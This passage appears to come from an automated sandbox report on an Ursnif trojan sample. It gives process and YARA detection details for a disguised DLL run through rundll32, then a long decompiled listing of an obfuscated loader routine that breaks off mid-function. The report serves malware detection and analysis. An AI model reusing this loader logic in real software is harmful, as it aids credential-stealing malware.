Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.275314133.0000000004B10000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6148 Parent PID: 6092

General

Start time:	10:00:20
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\0204.gif.dll',#1
Imagebase:	0x140000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.286549571.00000000047D0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 6112 Parent PID: 6104 rundll32.exeCOMMON

Executed Functions

Function 03335F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E03335F16(void* __eax, signed int __ebx, void* __ecx, signed int __edx, signed int __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edi;
				signed int _t610;
				void* _t612;
				signed int _t613;
				intOrPtr _t619;
				void* _t626;
				void* _t628;
				void* _t630;
				signed int _t631;
				signed int _t633;
				signed int _t636;
				signed int _t638;
				void* _t640;
				intOrPtr _t641;
				signed int _t644;
				void* _t646;
				signed int _t647;
				signed int _t650;
				signed int _t652;
				signed int _t653;
				intOrPtr _t656;
				signed int _t658;
				signed int _t661;
				signed int _t665;
				void* _t667;
				signed int _t668;
				signed int _t671;
				signed int _t675;
				signed int _t677;
				void* _t679;
				signed int _t680;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				void* _t691;
				signed int _t692;
				signed int _t698;
				signed int _t701;
				signed int _t706;
				void* _t708;
				intOrPtr _t709;
				signed int _t711;
				void* _t713;
				signed int _t714;
				signed int _t717;
				intOrPtr _t720;
				signed int _t722;
				void* _t724;
				signed int _t726;
				intOrPtr _t729;
				void* _t730;
				signed int _t733;
				void* _t739;
				void* _t741;
				void* _t742;
				signed int _t744;
				void* _t746;
				signed int _t747;
				signed int _t753;
				signed int _t756;
				signed int _t760;
				void* _t762;
				signed int _t767;
				signed int _t771;
				void* _t773;
				void* _t775;
				void* _t776;
				intOrPtr _t778;
				signed int _t781;
				signed int _t785;
				intOrPtr _t788;
				signed int _t791;
				intOrPtr _t794;
				signed int _t797;
				signed int _t813;
				signed int _t816;
				void* _t819;
				signed int _t821;
				signed int _t824;
				void* _t827;
				void* _t828;
				void* _t830;
				signed int _t836;
				signed int _t840;
				signed int _t842;
				signed int _t844;
				signed int _t851;
				signed int _t856;
				signed int _t859;
				signed int _t862;
				signed int _t865;
				signed int _t867;
				signed int _t869;
				signed int _t875;
				signed int _t882;
				void* _t888;
				signed int _t889;
				signed int _t893;
				signed int _t896;
				signed int _t901;
				signed int _t906;
				signed int _t908;
				signed int _t916;
				signed int _t920;
				signed int _t924;
				signed int _t926;
				signed int _t928;
				signed int _t931;
				signed int _t934;
				signed int _t936;
				signed int _t939;
				signed int _t945;
				signed int _t947;
				signed int _t950;
				signed int _t953;
				signed int _t955;
				signed int _t958;
				void* _t966;
				signed int _t969;
				signed int _t975;
				signed int _t977;
				signed int _t979;
				signed int _t981;
				signed int _t986;
				signed int _t987;
				signed int _t1002;
				signed int _t1005;
				signed int _t1009;
				signed int _t1012;
				signed int _t1015;
				signed int _t1018;
				signed int _t1020;
				signed int _t1023;
				signed int _t1026;
				signed int _t1028;
				signed int _t1031;
				signed int _t1034;
				signed int _t1035;
				void* _t1036;
				long _t1041;
				void* _t1043;
				signed int _t1045;
				signed int _t1052;
				signed int _t1054;
				signed int _t1057;
				signed int _t1060;
				signed int _t1063;
				signed int _t1065;
				signed int _t1068;
				void* _t1069;
				signed int _t1071;
				signed int _t1074;
				void* _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1085;
				void* _t1089;
				signed int _t1091;
				void* _t1097;
				void* _t1102;
				signed int _t1103;
				signed int _t1106;
				void* _t1109;
				signed int _t1112;
				signed int _t1119;
				signed int* _t1120;
				signed int* _t1121;
				signed int* _t1122;
				signed int* _t1123;
				signed int* _t1124;
				signed int* _t1125;
				signed int* _t1126;
				signed int* _t1127;
				signed int* _t1128;
				signed int* _t1129;
				signed int* _t1130;
				signed int* _t1131;
				signed int* _t1132;
				signed int* _t1133;
				signed int* _t1134;
				signed int* _t1136;
				signed int* _t1139;
				signed int* _t1140;
				signed int* _t1141;
				signed int* _t1142;
				signed int* _t1143;
				signed int* _t1144;

				_t1063 = __esi;
				_t813 = __ebx;
				_push(__eax);
				 *_t1119 =  *_t1119 & 0x00000000;
				 *_t1119 =  *_t1119 + _t1102;
				_t1103 = _t1119;
				_t1120 = _t1119 + 0xfffffff0;
				_push(_t1103);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 + __ecx;
				_push(__ecx);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 ^ __edx;
				_push(_t1103);
				 *_t1120 =  *_t1120 ^ _t1103;
				 *_t1120 =  *_t1120 ^ __ebx + 0x0041cca8;
				_v16 = _v16 & 0x00000000;
				_push(_v16);
				 *_t1120 =  *_t1120 + __ebx + 0x41cd5f;
				_push( *((intOrPtr*)(__ebx + 0x41f068))());
				_pop( *_t7);
				_push(_v16);
				_pop( *_t9);
				_pop( *_t10);
				_t920 = _v16;
				_t1121 = _t1120 - 0xfffffffc;
				_push(__esi);
				 *_t1121 =  *_t1121 ^ __esi;
				 *_t1121 =  *_t1120;
				_push(_v16);
				 *_t1121 = _t920;
				_push(_t1002);
				 *_t1121 =  *_t1121 - _t1002;
				 *_t1121 =  *_t1121 ^ __ebx + 0x0041c01b;
				_t610 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(_v16);
				 *_t1121 = _t610;
				_push(__esi);
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + __ebx + 0x41c678;
				_t612 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_pop( *_t18);
				_push(_t920);
				 *_t20 = _t612;
				_v20 = _v20 + _v20;
				_push(_v20);
				_pop(_t613);
				_v20 = _t613;
				_t836 = 0 ^  *(__ebx + 0x41c55d);
				if(_t836 > _v20) {
					_push(_v12);
					 *_t1121 = __ebx + 0x41c01b;
					_push(_t1103);
					 *_t1121 =  *_t1121 ^ _t1103;
					 *_t1121 =  *_t1121 + __ebx + 0x41c678;
					_push( *((intOrPtr*)(__ebx + 0x41f064))());
					_pop( *_t31);
					_push(_v20);
					_pop( *_t33);
				}
				_pop( *_t34);
				_t924 = _v20;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t924;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c8b2;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41d167;
				_t619 =  *((intOrPtr*)(_t813 + 0x41f068))(_t924, _t924, _t836);
				_v12 = _t836;
				 *((intOrPtr*)(_t813 + 0x41c883)) = _t619;
				 *_t1121 = _t813 + 0x41c565;
				_v12 = 0;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c574;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_v12, _v20));
				_pop( *_t48);
				_push(_v20);
				_pop( *_t50);
				_pop( *_t51);
				 *_t1121 =  *_t1121 - _t1103;
				 *_t1121 =  *_t1121 ^ _v20;
				 *_t1121 =  *_t1121 ^ _t813;
				 *_t1121 =  *_t1121 + _t813 + 0x41cd20;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_t813, _t1103));
				_pop( *_t55);
				_push(_v16);
				_pop( *_t57);
				_t626 =  *((intOrPtr*)(_t813 + 0x41f060))();
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t626;
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
				_t628 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16);
				 *_t1121 =  *_t1121 ^ _t924;
				 *_t1121 =  *_t1121 + _t628;
				_v12 = _v12 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041cfe9;
				_t630 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t924);
				_pop( *_t72);
				_t840 = _v20;
				 *_t74 = _t630;
				_v20 = _v20 + _t840;
				_push(_v20);
				_pop(_t631);
				_t1065 = _t1063;
				_t842 = _t840 & 0x00000000 | _t1103 & 0x00000000 ^  *(_t813 + 0x41ca09);
				_t1106 = _t1103;
				if(_t842 > _t631) {
					 *_t1121 =  *_t1121 & 0x00000000;
					 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
					 *_t1121 = _t813 + 0x41cfe9;
					_t631 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _t813);
					_push(_t924);
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) & 0x00000000;
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) ^ _t924 & 0x00000000 ^ _t631;
				}
				_t633 = _t631 & 0x00000000 ^  *_t1121;
				_t1122 =  &(_t1121[1]);
				 *_t1122 = _t1002;
				 *(_t813 + 0x41d240) = _t633;
				_t1005 = 0;
				_pop( *_t88);
				_t926 = 0 ^ _v20;
				_pop( *_t90);
				_t844 = _t842 & 0x00000000 ^ _v16;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t926;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 | _t844;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041c624;
				_v12 = _v12 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041d36b;
				_t636 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t926, _t1005, _t633);
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) & 0x00000000;
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) | _t844 -  *_t1122 ^ _t636;
				_t1123 =  &(_t1122[1]);
				_v16 = _v16 & 0x00000000;
				 *_t1123 =  *_t1123 ^  *_t1122;
				_v16 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c891;
				_t638 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16, _t844);
				 *_t1123 =  *_t1123 - _t1106;
				 *_t1123 =  *_t1123 | _t638;
				_v12 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c30f;
				_t640 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t1106);
				_t851 =  *_t1123;
				_t1124 =  &(_t1123[1]);
				 *_t113 = _t640;
				_v16 = _v16 + _t851;
				_push(_v16);
				_pop(_t641);
				_t928 = _t926;
				_v16 = _t1005;
				if((_t851 & 0x00000000 | _t1005 ^ _v16 |  *(_t813 + 0x41ca38)) > _t641) {
					_v20 = _v20 & 0x00000000;
					 *_t1124 =  *_t1124 | _t813 + 0x0041c891;
					_v12 = 0;
					 *_t1124 =  *_t1124 + _t813 + 0x41c30f;
					_t641 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _v20);
				}
				 *_t1124 = _t928;
				 *((intOrPtr*)(_t813 + 0x41c910)) = _t641;
				_t931 = 0;
				_v12 = _t1065;
				_t1068 = _v12;
				_v12 = 0;
				 *_t1124 =  *_t1124 | 0 ^ _a4;
				_v16 = 0;
				 *_t1124 =  *_t1124 | _t813 + 0x0041c9ef;
				_t644 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v12);
				_v12 = 0;
				 *_t1124 =  *_t1124 ^ _t644;
				 *_t1124 = _t813 + 0x41cb65;
				_t646 =  *((intOrPtr*)(_t813 + 0x41f060))(_v20, _v12);
				_t1125 =  &(_t1124[1]);
				_v12 = _t931;
				_push( *_t1124 + _t646);
				_t934 = _v12;
				_pop(_t647);
				_v12 = _t647;
				_t856 = 0 ^  *(_t813 + 0x41c187);
				_t650 = _v12;
				if(_t856 > _t650) {
					_v20 = 0;
					 *_t1125 =  *_t1125 | _t813 + 0x0041c9ef;
					 *_t1125 =  *_t1125 ^ _t856;
					 *_t1125 =  *_t1125 + _t813 + 0x41cb65;
					_t650 =  *((intOrPtr*)(_t813 + 0x41f064))(_t856, _v20);
					_v16 = _t1068;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) & 0x00000000;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) | _t1068 ^ _v16 | _t650;
					_t1068 = _v16;
				}
				_t652 = _t650 & 0x00000000 ^  *_t1125;
				_t1126 = _t1125 - 0xfffffffc;
				 *_t162 = _t652;
				_v16 = _v16 +  *((intOrPtr*)(_t652 + 0x3c));
				_push(_v16);
				_pop(_t653);
				_t936 = _t934;
				 *_t1126 = _t653;
				 *_t1126 =  *_t1126 & 0x00000000;
				 *_t1126 =  *_t1126 ^ _t813 + 0x0041c16e;
				 *_t1126 = _t813 + 0x41ce8a;
				_t656 =  *((intOrPtr*)(_t813 + 0x41f068))(_v20, _t1068, _v20);
				 *_t1126 = _t1106;
				 *((intOrPtr*)(_t813 + 0x41c0cc)) = _t656;
				_t1109 = 0;
				_t658 =  *_t1126;
				_t1127 =  &(_t1126[1]);
				 *_t1127 = _t658;
				 *_t1127 =  *_t1127 - _t856;
				 *_t1127 =  *_t1127 ^ _t658;
				 *_t1127 =  *_t1127 - _t936;
				 *_t1127 =  *_t1127 + _t813 + 0x41c791;
				_v12 = _v12 & 0x00000000;
				 *_t1127 =  *_t1127 ^ _t813 + 0x0041ca02;
				_t661 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t936, _t856, _v16);
				 *_t1127 = _t936;
				 *(_t813 + 0x41c9e0) = 0 ^ _t661;
				_t939 = 0;
				_t1128 = _t1127 - 0xfffffffc;
				_v20 = _t813;
				_t1009 =  *_t1127;
				_t816 = _v20;
				_v12 = 0;
				 *_t1128 =  *_t1128 | _t816 + 0x0041c000;
				_t665 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12);
				 *_t1128 =  *_t1128 ^ _t1009;
				 *_t1128 = _t665;
				 *_t1128 =  *_t1128 - _t1009;
				 *_t1128 =  *_t1128 ^ _t816 + 0x0041cc73;
				_t667 =  *((intOrPtr*)(_t816 + 0x41f060))(_t1009, _t1009);
				_t1129 =  &(_t1128[1]);
				 *_t1129 =  *_t1129 ^ _t1068;
				_t1069 = _t667;
				_t668 = _t1069 + (_t856 & 0x00000000 |  *_t1128);
				_t1071 = 0;
				_v20 = _t1009;
				_t859 = 0 ^  *(_t816 + 0x41c250);
				_t1012 = _v20;
				if(_t859 > _t668) {
					 *_t1129 =  *_t1129 - _t1012;
					 *_t1129 =  *_t1129 ^ _t816 + 0x0041c000;
					_v12 = 0;
					 *_t1129 =  *_t1129 | _t816 + 0x0041cc73;
					_t668 =  *((intOrPtr*)(_t816 + 0x41f064))(_v12, _t1012);
				}
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) & 0x00000000;
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) | _t859 & 0x00000000 ^ _t668;
				_t862 = _t859;
				 *_t1129 =  *_t1129 - _t1071;
				 *_t1129 =  *_t1129 + ( *(_t1012 + 6) & 0x0000ffff);
				 *_t1129 = _t816 + 0x41ca88;
				_t671 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12, _t1071);
				_v20 = _t862;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) & 0x00000000;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) | _t862 ^ _v20 ^ _t671;
				_t865 = _v20;
				_pop( *_t211);
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ (_t816 & 0x00000000 | 0 ^ _v16);
				_t819 = _t816;
				 *_t1129 =  *_t1129 & 0x00000000;
				 *_t1129 =  *_t1129 ^ _t819 + 0x0041c863;
				_t675 =  *((intOrPtr*)(_t819 + 0x41f060))(_t819);
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) & 0x00000000;
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) | _t1109 -  *_t1129 ^ _t675;
				_t1112 = _t1109;
				 *_t1129 =  *_t1129 - _t865;
				 *_t1129 =  *_t1129 ^ _t1012;
				 *_t1129 = _t819 + 0x41ca0d;
				_t677 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _t865);
				 *_t1129 = _t677;
				 *_t1129 = _t819 + 0x41cbe6;
				_t679 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _v20);
				_t867 =  *_t1129;
				_t1130 = _t1129 - 0xfffffffc;
				 *_t230 = _t679;
				_v16 = _v16 + _t867;
				_push(_v16);
				_pop(_t680);
				_t821 = _t819;
				_t869 = _t867 & 0x00000000 | _t1071 & 0x00000000 ^  *(_t821 + 0x41d053);
				_t1074 = _t1071;
				if(_t869 > _t680) {
					_t235 = _t821 + 0x41ca0d; // 0x41ca0d
					_v12 = 0;
					 *_t1130 =  *_t1130 | _t235;
					_t238 = _t821 + 0x41cbe6; // 0x41cbe6
					 *_t1130 =  *_t1130 & 0x00000000;
					 *_t1130 =  *_t1130 + _t238;
					_t680 =  *((intOrPtr*)(_t821 + 0x41f064))(_t1074, _v12);
				}
				 *_t1130 = _t1012;
				 *(_t821 + 0x41c918) = 0 ^ _t680;
				_t1015 = 0;
				_v16 = _t869;
				_v16 = 0;
				 *_t1130 =  *_t1130 + (_t939 & 0x00000000 | _t869 ^ _v16 |  *(_t1015 + 0x54));
				_t247 = _t821 + 0x41d093; // 0x41d093
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 | _t247;
				_t682 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t1130 = _t1015;
				 *(_t821 + 0x41c4f0) = 0 ^ _t682;
				_t1018 = 0;
				 *_t250 = _t821;
				_t1020 = _t1018 & 0x00000000 ^ (_t1074 ^  *_t1130 |  *(_t821 + 0x41c166));
				_t1077 = _t1074;
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 ^ _v16;
				_t253 = _t821 + 0x41cfd9; // 0x41cfd9
				_v20 = 0;
				 *_t1130 =  *_t1130 | _t253;
				_t684 =  *((intOrPtr*)(_t821 + 0x41f060))(_v20, _t1077);
				_v20 = _t1020;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) & 0x00000000;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) | _t1020 ^ _v20 ^ _t684;
				_t1023 = _v20;
				_t1131 =  &(_t1130[1]);
				 *_t1131 = _t684;
				_t1078 = _a4;
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 |  *_t1130;
				_t268 = _t821 + 0x41ca9e; // 0x41ca9e
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 | _t268;
				_t689 =  *((intOrPtr*)(_t821 + 0x41f060))(_v12, _v12, 0);
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t689;
				_t273 = _t821 + 0x41c931; // 0x41c931
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t273;
				_t691 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t275 = _t1023;
				_v20 = _t821;
				_push(0 + _v16 + _t691);
				_t824 = _v20;
				_pop(_t692);
				_push( *((intOrPtr*)(_t824 + 0x41cccf)));
				_pop( *_t280);
				_push(_v12);
				_pop(_t875);
				if(_t875 > _t692) {
					 *_t1131 = _t824 + 0x41ca9e;
					 *_t1131 =  *_t1131 & 0x00000000;
					 *_t1131 =  *_t1131 ^ _t824 + 0x0041c931;
					_t692 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1078, _v16);
					 *_t286 = _t692;
					_push(_v16);
					_pop( *_t288);
				}
				_pop( *_t289);
				_t945 = _v12;
				_v12 = _t692;
				 *_t1131 = _t875 & 0x00000000 | _t692 ^ _v12 | _t945;
				 *_t1131 =  *_t1131 ^ _t824;
				 *_t1131 =  *_t1131 + _t945;
				_v12 = 0;
				 *_t1131 =  *_t1131 ^ _t824 + 0x0041d1ba;
				 *_t1131 = _t824 + 0x41c856;
				_t698 =  *((intOrPtr*)(_t824 + 0x41f068))(_v16, _v12, _t824, _v12);
				_v20 = _t1078;
				 *(_t824 + 0x41c0c8) = 0 ^ _t698;
				_t1081 = _v20;
				_pop( *_t304);
				_t947 = 0 ^ _v20;
				_t879 = 0 ^  *_t1131;
				_t1132 = _t1131 - 0xfffffffc;
				if(_t1023 != _t1081) {
					 *_t1132 =  *_t1132 - _t1023;
					 *_t1132 =  *_t1132 ^ _t879;
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 + _t947;
					_v16 = 0;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041c7a9;
					_t739 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20, _t1023);
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t739;
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041d026;
					_t741 =  *((intOrPtr*)(_t824 + 0x41f060))(_t824, _v12);
					_t1139 = _t1132 - 0xfffffffc;
					 *_t317 = _t741;
					_v20 = _v20 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v20);
					_pop(_t742);
					_t1045 = _t1023;
					_push(0);
					 *_t1139 = _t1045;
					_t906 = 0 ^  *(_t824 + 0x41c244);
					if(_t906 > _t742) {
						 *_t1139 =  *_t1139 ^ _t906;
						 *_t1139 =  *_t1139 | _t824 + 0x0041c7a9;
						 *_t1139 =  *_t1139 & 0x00000000;
						 *_t1139 =  *_t1139 + _t824 + 0x41d026;
						_t797 =  *((intOrPtr*)(_t824 + 0x41f064))(_t824, _t906);
						_push(0);
						 *_t1139 = _t947;
						 *(_t824 + 0x41cf47) = 0 ^ _t797;
					}
					_pop( *_t326);
					_t969 = _v12;
					_t908 =  *_t1139;
					_t1140 = _t1139 - 0xfffffffc;
					do {
						asm("movsb");
						_v12 = 0;
						 *_t1140 =  *_t1140 + _t908;
						_v12 = _v12 & 0x00000000;
						 *_t1140 =  *_t1140 + _t969;
						 *_t1140 =  *_t1140 - _t969;
						 *_t1140 =  *_t1140 | _t824 + 0x0041c831;
						_t744 =  *((intOrPtr*)(_t824 + 0x41f060))(_t969, _v12, _v12);
						 *_t1140 =  *_t1140 ^ _t1112;
						 *_t1140 =  *_t1140 ^ _t744;
						 *_t1140 =  *_t1140 & 0x00000000;
						 *_t1140 =  *_t1140 ^ _t824 + 0x0041c7fa;
						_t746 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1081, _t1112);
						_t1141 =  &(_t1140[1]);
						 *_t337 = _t746;
						_v20 = _v20 +  *_t1140;
						_push(_v20);
						_pop(_t747);
						_t1081 = _t1081;
						_v12 = _t747;
						if((0 ^  *(_t824 + 0x41c054)) > _v12) {
							 *_t1141 = _t824 + 0x41c831;
							 *_t1141 = _t824 + 0x41c7fa;
							_t794 =  *((intOrPtr*)(_t824 + 0x41f064))(_v16, _v16);
							_v16 = _t969;
							 *((intOrPtr*)(_t824 + 0x41c254)) = _t794;
						}
						_pop( *_t352);
						_t969 = 0 + _v12;
						_t1140 = _t1141 - 0xfffffffc;
						_t908 =  *_t1141 - 1;
					} while (_t908 != 0);
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t969;
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041ccd3;
					_v20 = 0;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041c339;
					_t753 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t908, _t908);
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) & 0x00000000;
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) ^ _t969 ^  *_t1140 ^ _t753;
					_t975 =  *_t1140;
					_t1142 = _t1140 - 0xfffffffc;
					_v12 = _t753;
					_t756 = _v12;
					 *_t1142 =  *_t1142 ^ _t756;
					 *_t1142 =  *_t1142 ^ _t975;
					_v20 = _v20 & 0x00000000;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c8b7;
					_push( *((intOrPtr*)(_t824 + 0x41f060))(_v20, _t756, _t969));
					_pop( *_t371);
					_push(_v16);
					_pop( *_t373);
					_pop( *_t374);
					_t977 = _t975 & 0x00000000 ^ _v16;
					 *(_t824 + 0x41c60a) = 0x40;
					 *_t1142 = _t977;
					_v16 = 0;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c4cb;
					_t760 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20);
					 *_t1142 = _t760;
					 *_t1142 = _t824 + 0x41c438;
					_t762 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v12);
					_pop( *_t386);
					 *_t1142 =  *_t1142 | _t824;
					_t830 = _t762;
					_t824 = 0;
					_v16 =  *((intOrPtr*)(_t824 + 0x41c166));
					_t916 =  *(_t824 + 0x41d118);
					_t1052 = _v16;
					if(_t916 > _t830 + _v20 + (_t908 & 0x00000000)) {
						_t391 = _t824 + 0x41c4cb; // 0x41c4cb
						 *_t1142 =  *_t1142 - _t916;
						 *_t1142 =  *_t1142 + _t391;
						_t392 = _t824 + 0x41c438; // 0x41c438
						 *_t1142 =  *_t1142 ^ _t977;
						 *_t1142 =  *_t1142 | _t392;
						_t791 =  *((intOrPtr*)(_t824 + 0x41f064))(_t977, _t916);
						_v20 = _t977;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) & 0x00000000;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) | _t977 - _v20 ^ _t791;
					}
					_t979 =  *_t1142;
					_t1143 = _t1142 - 0xfffffffc;
					_t401 = _t824 + 0x41c60a; // 0x41c60a
					 *_t1143 =  *_t1143 - _t979;
					 *_t1143 =  *_t1143 ^ _t401;
					 *_t1143 = _t979;
					_t403 = _t824 + 0x41cb46; // 0x41cb46
					 *_t1143 =  *_t1143 & 0x00000000;
					 *_t1143 =  *_t1143 + _t403;
					_t404 = _t824 + 0x41c91c; // 0x41c91c
					 *_t1143 = _t404;
					_t767 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t824, _v16, _t979);
					 *_t1143 = _t1081;
					 *(_t824 + 0x41cf40) = 0 ^ _t767;
					_t1097 = 0;
					_t981 =  *_t1143;
					_t1144 =  &(_t1143[1]);
					_pop( *_t408);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + (0 ^ _v20);
					 *_t1144 = _t981;
					_t411 = _t824 + 0x41cc6e; // 0x41cc6e
					 *_t1144 = _t411;
					_t771 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v16, _t916);
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) & 0x00000000;
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) ^ _t981 & 0x00000000 ^ _t771;
					 *_t418 = _t981;
					_t986 = _v12;
					 *_t1144 = 2;
					_v12 = _v12 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t986;
					_t423 = _t824 + 0x41cfff; // 0x41cfff
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t423;
					_t773 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _v12, _t824);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + _t773;
					_t425 = _t824 + 0x41c3b9; // 0x41c3b9
					 *_t1144 =  *_t1144 - _t1112;
					 *_t1144 =  *_t1144 | _t425;
					_t775 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _t986);
					_t1132 =  &(_t1144[1]);
					 *_t427 = _t775;
					_v20 = _v20 + (_t916 & 0x00000000 |  *_t1144);
					_push(_v20);
					_pop(_t776);
					_t1054 = _t1052;
					 *_t1132 = _t1054;
					_t879 =  *(_t824 + 0x41d0fa);
					_t1057 = 0;
					if(_t879 > _t776) {
						_t432 = _t824 + 0x41cfff; // 0x41cfff
						 *_t1132 =  *_t1132 - _t1112;
						 *_t1132 =  *_t1132 + _t432;
						_t433 = _t824 + 0x41c3b9; // 0x41c3b9
						 *_t1132 =  *_t1132 ^ _t1112;
						 *_t1132 =  *_t1132 + _t433;
						_t788 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1112, _t1112);
						_v12 = _t1097;
						 *((intOrPtr*)(_t824 + 0x41d019)) = _t788;
						_t1097 = _v12;
					}
					_pop( *_t438);
					_t987 = _v12;
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 = _t987;
					_t440 = _t824 + 0x41c42d; // 0x41c42d
					 *_t1132 =  *_t1132 - _t1097;
					 *_t1132 =  *_t1132 + _t440;
					_t778 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1097, _t824);
					 *_t1132 = _t1057;
					 *((intOrPtr*)(_t824 + 0x41c664)) = _t778;
					_t1060 = 0;
					_v16 = _v16 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1060;
					_t446 = _t824 + 0x41c4b9; // 0x41c4b9
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t446;
					_t449 = _t824 + 0x41c298; // 0x41c298
